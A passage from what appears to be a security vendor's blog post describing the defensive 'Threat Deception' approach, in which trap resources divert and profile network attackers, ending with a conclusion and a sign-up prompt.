to send the attacker in the wrong direction (e.g., to a dedicated subnet), and thereby concealing valuable resources from their field of view, as well as obtaining additional information about the attacker and their tools, which can be used to investigate the incident further;
to identify compromised resources and take all necessary measures to eliminate the threat (e.g., to isolate infected workstations from the rest of the resources on the corporate network);
to reconstruct the chronology of actions and movements of the attacker inside the corporate network and to define the entry points so that they can be eliminated.

Conclusion

The attacker has an advantage over the defender, because they have the ability to thoroughly examine their victim before carrying out an attack. The victim doesn’t know where the attack will come from or what the attacker is interested in, and so has to protect against all possible attack scenarios, which requires a significant amount of time and resources.

Implementation of the Threat Deception approach gives the defending side an additional source of information on threats thanks to resource traps. The approach also minimizes the advantage enjoyed by the attacker due to both the early detection of their activity and the information obtained about their profile that enables timely measures to be taken to protect valuable data. It is not necessary to use prohibited “offensive security” methods, which could make the situation worse for the defending side if law enforcement agencies get involved in investigating the incident.

Interactive security measures that are based on deceiving the attacker will only gain in popularity as the number of incidents in the corporate and public sector increases. Soon, systems based on the Threat Deception approach will become not just a tool of the researchers but an integral part of a protected infrastructure and yet another source of information about incidents for security services.

If you’re interested in implementing the Threat Deception concept described in the post on your corporate network, please complete the form below: